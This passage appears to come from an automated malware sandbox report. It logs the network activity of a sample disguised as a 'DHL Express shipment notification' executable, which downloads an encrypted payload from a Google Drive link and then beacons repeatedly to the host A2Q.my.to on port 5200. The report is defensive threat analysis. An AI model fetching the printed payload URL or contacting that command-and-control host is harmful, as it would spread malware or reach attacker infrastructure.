Dec 1, 2021 19:26:22.853193998 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.853327036 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.853472948 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.853514910 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.853682041 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.853717089 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.854036093 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.854060888 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.854079962 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.854413033 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.854437113 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.854604959 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.854640007 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.854662895 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.854734898 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.854924917 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.855340958 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.855546951 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.855593920 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.855767965 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.855794907 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.855839968 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.856184006 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.856218100 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.856237888 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.856411934 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.856483936 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.856719017 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.856765985 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.856802940 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.857000113 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.857017994 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.857031107 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.857053995 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.857191086 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.857383013 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.857415915 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.857652903 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.857738018 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.857774019 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.857896090 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.857924938 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.857948065 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.858129978 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.858233929 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.858268023 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.858406067 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.858434916 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.858572006 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.858588934 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.858602047 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.858623981 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.858859062 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.858890057 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.858911991 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.859085083 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.859179974 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.859213114 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.859380007 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.859427929 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.859463930 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.859771967 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.860099077 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.860136032 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.860145092 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.860158920 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.860274076 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.860340118 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.860465050 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.860497952 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.860660076 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.860754013 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.860848904 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.860888958 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.861002922 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.861069918 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.861089945 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.861107111 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.861288071 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.861327887 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.861490011 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.861524105 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.861649036 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.861794949 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:22.861844063 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.861938000 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.864604950 CET	49767	443	192.168.11.20	142.250.185.161
Dec 1, 2021 19:26:22.864661932 CET	443	49767	142.250.185.161	192.168.11.20
Dec 1, 2021 19:26:28.349637032 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:26:28.368562937 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:26:28.368788004 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:26:28.391652107 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:26:28.432295084 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:26:28.832216978 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:26:28.917673111 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:26:28.917824984 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:26:28.980232000 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:26:43.210285902 CET	49712	80	192.168.11.20	93.184.220.29
Dec 1, 2021 19:26:43.221652985 CET	80	49712	93.184.220.29	192.168.11.20
Dec 1, 2021 19:26:43.221831083 CET	49712	80	192.168.11.20	93.184.220.29
Dec 1, 2021 19:26:48.388757944 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:26:48.389404058 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:26:48.454616070 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:27:08.402352095 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:27:08.402908087 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:27:08.471563101 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:27:28.417957067 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:27:28.418481112 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:27:28.487720966 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:27:48.423587084 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:27:48.424155951 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:27:48.493582010 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:28:08.435609102 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:28:08.436199903 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:28:08.504610062 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:28:28.436896086 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:28:28.437813044 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:28:28.507606030 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:28:48.439743042 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:28:48.440274000 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:28:48.510544062 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:29:08.447582960 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:29:08.448041916 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:29:08.516542912 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:29:28.448441029 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:29:28.448929071 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:29:28.519558907 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:29:48.449531078 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:29:48.450119019 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:29:48.520989895 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:30:08.451169968 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:30:08.451653957 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:30:08.520595074 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:30:28.464010000 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:30:28.464556932 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:30:28.535480022 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:30:48.465590000 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:30:48.466223001 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:30:48.537483931 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:31:08.466618061 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:31:08.467180967 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:31:08.537518024 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:31:28.468311071 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:31:28.473108053 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:31:28.543175936 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:31:48.524781942 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:31:48.525298119 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:31:48.597709894 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:32:08.536263943 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:32:08.536959887 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:32:08.613631964 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:32:28.551774025 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:32:28.552301884 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:32:28.629019976 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:32:48.568120956 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:32:48.568696022 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:32:48.644681931 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:33:08.582859039 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:33:08.583393097 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:33:08.660265923 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:33:28.601630926 CET	5200	49768	194.85.248.156	192.168.11.20
Dec 1, 2021 19:33:28.602211952 CET	49768	5200	192.168.11.20	194.85.248.156
Dec 1, 2021 19:33:28.676063061 CET	5200	49768	194.85.248.156	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2021 19:25:37.520550013 CET	56999	53	192.168.11.20	1.1.1.1
Dec 1, 2021 19:25:37.530525923 CET	53	56999	1.1.1.1	192.168.11.20
Dec 1, 2021 19:25:38.368060112 CET	60798	53	192.168.11.20	1.1.1.1
Dec 1, 2021 19:25:38.401494026 CET	53	60798	1.1.1.1	192.168.11.20
Dec 1, 2021 19:26:21.866683960 CET	50331	53	192.168.11.20	1.1.1.1
Dec 1, 2021 19:26:21.901261091 CET	53	50331	1.1.1.1	192.168.11.20
Dec 1, 2021 19:26:22.148561001 CET	56676	53	192.168.11.20	1.1.1.1
Dec 1, 2021 19:26:22.172840118 CET	53	56676	1.1.1.1	192.168.11.20
Dec 1, 2021 19:26:26.858731031 CET	59409	53	192.168.11.20	1.1.1.1
Dec 1, 2021 19:26:27.870095968 CET	59409	53	192.168.11.20	9.9.9.9
Dec 1, 2021 19:26:28.348496914 CET	53	59409	9.9.9.9	192.168.11.20
Dec 1, 2021 19:26:28.787271976 CET	53	59409	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 1, 2021 19:25:37.520550013 CET	192.168.11.20	1.1.1.1	0x3431	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)
Dec 1, 2021 19:25:38.368060112 CET	192.168.11.20	1.1.1.1	0xdcf0	Standard query (0)	doc-10-6k-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Dec 1, 2021 19:26:21.866683960 CET	192.168.11.20	1.1.1.1	0xb93e	Standard query (0)	doc-0c-74-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Dec 1, 2021 19:26:22.148561001 CET	192.168.11.20	1.1.1.1	0x3016	Standard query (0)	docs.google.com	A (IP address)	IN (0x0001)
Dec 1, 2021 19:26:26.858731031 CET	192.168.11.20	1.1.1.1	0x5739	Standard query (0)	A2Q.my.to	A (IP address)	IN (0x0001)
Dec 1, 2021 19:26:27.870095968 CET	192.168.11.20	9.9.9.9	0x5739	Standard query (0)	A2Q.my.to	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 1, 2021 19:25:37.530525923 CET	1.1.1.1	192.168.11.20	0x3431	No error (0)	drive.google.com		142.250.185.206	A (IP address)	IN (0x0001)
Dec 1, 2021 19:25:38.401494026 CET	1.1.1.1	192.168.11.20	0xdcf0	No error (0)	doc-10-6k-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 19:25:38.401494026 CET	1.1.1.1	192.168.11.20	0xdcf0	No error (0)	googlehosted.l.googleusercontent.com		216.58.212.161	A (IP address)	IN (0x0001)
Dec 1, 2021 19:26:21.901261091 CET	1.1.1.1	192.168.11.20	0xb93e	No error (0)	doc-0c-74-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 19:26:21.901261091 CET	1.1.1.1	192.168.11.20	0xb93e	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.161	A (IP address)	IN (0x0001)
Dec 1, 2021 19:26:22.172840118 CET	1.1.1.1	192.168.11.20	0x3016	No error (0)	docs.google.com		142.250.186.78	A (IP address)	IN (0x0001)
Dec 1, 2021 19:26:28.348496914 CET	9.9.9.9	192.168.11.20	0x5739	No error (0)	A2Q.my.to		194.85.248.156	A (IP address)	IN (0x0001)
Dec 1, 2021 19:26:28.787271976 CET	1.1.1.1	192.168.11.20	0x5739	No error (0)	A2Q.my.to		194.85.248.156	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

drive.google.com

doc-10-6k-docs.googleusercontent.com

doc-0c-74-docs.googleusercontent.com

docs.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49740	142.250.185.206	443	C:\Users\user\Desktop\DHL Express shipment notification.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 18:25:37 UTC	0	OUT	GET /uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2021-12-01 18:25:38 UTC	0	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 01 Dec 2021 18:25:38 GMT Location: https://doc-10-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4tipe54913jcp7asj48qkhdgaodfoob7/1638383100000/11612195336931281153/*/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'nonce-K8Pkv2XnGRA8kk8CYPxzUg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]} Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq" X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: NID=511=PCUCReJmoWpqNNqKO4_UkEHyi29_BVE3-UTrB3VIWMDCK28Vi4C51ApTQuDt5eJCkdd7valarSBw5jjh5O2AbOqMKaOCQXxYdvMjXDuxh9JnqNzMHtnTZsorv6Dq7QaujUxZ97nfTtPnW-orDUqsKBpi9peJYQtWVvXHi4Ubp9Y; expires=Thu, 02-Jun-2022 18:25:37 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-12-01 18:25:38 UTC	1	IN	Data Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 31 30 2d 36 6b 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 34 74 69 70 Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-10-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4tip
2021-12-01 18:25:38 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49741	216.58.212.161	443	C:\Users\user\Desktop\DHL Express shipment notification.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 18:25:38 UTC	2	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4tipe54913jcp7asj48qkhdgaodfoob7/1638383100000/11612195336931281153/*/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-10-6k-docs.googleusercontent.com Connection: Keep-Alive
2021-12-01 18:25:38 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdvLqwKfM1Y-EzSuCmPggD-6ZxMOlVDL09rJ1cuAe6Aop3dFL5Ky0EcetKaHM7KZ2mVZw0lu_V3gkv_4MvEe64ehytFgWQ Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/octet-stream Content-Disposition: attachment;filename="wamar_ChPkMi7.bin";filename*=UTF-8''wamar_ChPkMi7.bin Content-Length: 156224 Date: Wed, 01 Dec 2021 18:25:38 GMT Expires: Wed, 01 Dec 2021 18:25:38 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=4R1wKw== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-12-01 18:25:38 UTC	6	IN	Data Raw: a9 3e e5 01 df d0 81 1f 8e 73 0c 35 c6 77 5a 92 b3 87 c6 e9 89 b8 b4 3c 18 30 75 36 d3 91 4c 3a 41 80 b7 a3 cd 1f b7 c3 a2 94 5b 16 6b df d8 30 7d 04 25 47 ea 41 10 07 1b e2 07 23 e7 a8 a8 4a 46 ab c4 10 4c 1a 1a 21 96 55 fe e9 c3 7f cf eb 5b af 5f df af 8d e1 47 b7 ab e3 84 9a 28 9d c5 ee 0f a9 c6 e0 1d 96 9d 29 d6 96 58 62 63 f5 80 82 af 71 64 40 e0 e2 61 61 d5 b7 45 83 3b 60 27 d4 32 98 b0 ff da f7 d8 4f 26 30 94 f5 39 fc 66 c1 87 81 5e a2 ba 46 9b b1 72 c0 8a e5 1c 9c 55 86 2c 0e c5 3e d0 5d 1f cc fb 58 b0 d5 83 9a c8 8f 37 9d 3a 37 86 5a cf 84 f0 de 3f 88 6e 2a 13 bb 57 e1 cc 5a cd a6 5c 1c b6 2d 06 b3 ea 14 f1 7b 85 95 8f 0f f4 37 74 f8 49 49 1b c8 96 02 d5 c5 6a 41 a9 07 1a ed 52 c4 a0 2e 06 2e 1c 56 17 c9 6a 06 fe 0b e0 3b 01 cc a2 6a a5 4f 80 6c Data Ascii: >s5wZ<0u6L:A[k0}%GA#JFL!U[_G()Xbcqd@aaE;`'2O&09f^FrU,>]X7:7Z?n*WZ\-{7tIIjAR..Vj;jOl
